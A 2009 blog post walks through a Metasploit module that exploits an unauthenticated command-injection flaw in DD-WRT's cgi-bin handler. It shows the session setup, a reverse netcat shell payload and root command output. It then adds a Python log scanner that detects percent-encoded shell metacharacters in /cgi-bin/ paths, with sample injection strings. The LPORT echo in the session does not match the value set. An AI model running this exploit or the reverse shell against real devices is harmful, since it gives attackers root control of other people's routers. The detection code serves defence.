Sunday, 26 July 2009

Exploiting the cgi-bin vulnerability in dd-wrt

Metasploit's 3.3 development SVN tree now includes an exploit for DD-WRT, the Linux distribution for embedded devices. The module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. The flaw allows an unauthenticated attacker to execute arbitrary commands as the root user. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 with factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened ( ->
uname -a
Linux DD-WRTx86CI #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
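The session above shows the attacker side. From the defender's side, the useful observation is that the injected command travels inside the request path under /cgi-bin/, percent-encoded, so it can be spotted in HTTP request logs. The following Python is an added example written for this post, not code from the Metasploit module or the DD-WRT project. It assumes request logs in Common Log Format (for instance from a proxy or a capture in front of the gateway; the stock DD-WRT httpd is not assumed to log this way), and the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Common Log Format); not taken from the original post.
# Lines 3 and 4 carry percent-encoded shell metacharacters in a /cgi-bin/ path.
SAMPLE_LOG = """\
192.168.1.10 - - [26/Jul/2009:13:01:02 +0200] "GET /Status_Router.asp HTTP/1.1" 200 4210
192.168.1.10 - - [26/Jul/2009:13:01:05 +0200] "GET /cgi-bin/status.cgi HTTP/1.1" 200 812
192.168.1.77 - - [26/Jul/2009:13:02:41 +0200] "GET /cgi-bin/%3Buname%20-a HTTP/1.1" 200 0
192.168.1.77 - - [26/Jul/2009:13:02:42 +0200] "GET /cgi-bin/%7C%60id%60 HTTP/1.1" 200 0
"""

# One CLF record: source, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Shell metacharacters that have no legitimate place in a management-CGI path.
META_RE = re.compile(r'[;|&`$(){}<>\n]')


def decode_path(path):
    """Percent-decode until the result is stable (bounded), so double-encoding
    such as %253B does not hide a metacharacter from the check."""
    prev, cur = None, path
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def is_suspicious(path):
    """True when the decoded path is under /cgi-bin/ and contains a shell
    metacharacter. The query string is ignored; the injection is in the path."""
    decoded = decode_path(path.split('?', 1)[0])
    return decoded.startswith('/cgi-bin/') and META_RE.search(decoded) is not None


def scan_log(text):
    """Return one record per suspicious request: source address, timestamp and
    the decoded path, which is what an analyst wants to see in an alert."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF records
        if is_suspicious(m['path']):
            hits.append({'src': m['src'], 'ts': m['ts'], 'path': decode_path(m['path'])})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['path']!r}")
```

Run on the constructed sample, the scanner reports the two requests from 192.168.1.77 and ignores the ordinary status pages. Decoding before matching matters: a rule that looks for a literal `;` in the raw request line misses the `%3B` form that an encoded command line uses, and the bounded decode loop also catches a second layer of encoding. A hit from the LAN side, as in this post, is worth treating as a compromised host on the inside network rather than only a bad request.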
